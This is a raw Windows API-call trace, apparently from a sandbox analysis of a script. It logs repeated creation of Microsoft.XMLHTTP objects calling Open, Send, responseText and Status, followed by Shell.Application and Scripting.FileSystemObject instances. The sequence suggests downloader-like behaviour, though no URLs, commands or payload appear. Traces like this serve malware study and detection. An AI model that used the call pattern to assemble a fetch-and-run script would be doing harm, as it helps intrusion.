	[0374.978] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0374.978] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0374.978] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7530) returned 0x0
	[0374.978] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0374.978] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0374.978] ??2@YAPEAX_K@Z () returned 0x62f330
	[0374.978] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0374.978] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0374.979] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0374.979] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7530) returned 0x0
	[0374.979] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7530) returned 0x3
	[0374.979] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0374.979] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0374.979] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0374.979] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0374.979] SysStringLen (param_1=0x0) returned 0x0
	[0374.979] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0374.979] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0374.979] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0374.980] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0374.980] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0374.980] ??2@YAPEAX_K@Z () returned 0x62f310
	[0374.980] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0374.980] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0374.980] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0374.980] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0374.980] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0374.981] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0374.982] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0374.982] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0374.982] longjmp () 
	[0374.982] longjmp () 
	[0374.982] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0374.982] SysStringLen (param_1=0x0) returned 0x0
	[0374.982] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0374.982] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0374.982] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0374.982] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0374.983] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0374.983] ??2@YAPEAX_K@Z () returned 0x62f330
	[0374.983] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0374.983] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0374.983] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0374.983] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0374.983] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0374.983] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0374.983] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0374.983] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0374.983] longjmp () 
	[0374.984] longjmp () 
	[0374.984] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0374.984] SysStringLen (param_1=0x0) returned 0x0
	[0374.984] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0374.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0374.984] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0374.984] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0374.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0374.984] ??2@YAPEAX_K@Z () returned 0x62f310
	[0374.984] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f310) 
	[0374.984] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0374.984] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0374.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0374.984] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0374.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0374.984] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0374.985] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0374.985] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0374.985] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0374.985] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0375.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0375.142] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0375.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0375.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0375.142] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0375.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0375.142] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0375.143] SysStringLen (param_1=0x0) returned 0x0
	[0375.143] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0375.143] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0375.143] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x64ef970) returned 0x0
	[0375.143] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0375.143] Shell:IUnknown:QueryInterface (in: This=0x64ef970, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x64ef9b0) returned 0x0
	[0375.143] ??2@YAPEAX_K@Z () returned 0x62f350
	[0375.143] Shell:IObjectWithSite:SetSite (This=0x64ef9b0, pUnkSite=0x62f350) returned 0x0
	[0375.143] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0375.143] Shell:IUnknown:Release (This=0x64ef9b0) returned 0x1
	[0375.143] Shell:IUnknown:QueryInterface (in: This=0x64ef970, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x64ef970) returned 0x0
	[0375.143] Shell:IUnknown:AddRef (This=0x64ef970) returned 0x3
	[0375.143] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0375.143] SysStringLen (param_1=0x0) returned 0x0
	[0375.143] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0375.146] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0375.146] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0375.146] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0375.146] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0375.146] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0375.146] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0375.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0375.672] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0375.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0375.673] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0375.673] SysStringLen (param_1=0x0) returned 0x0
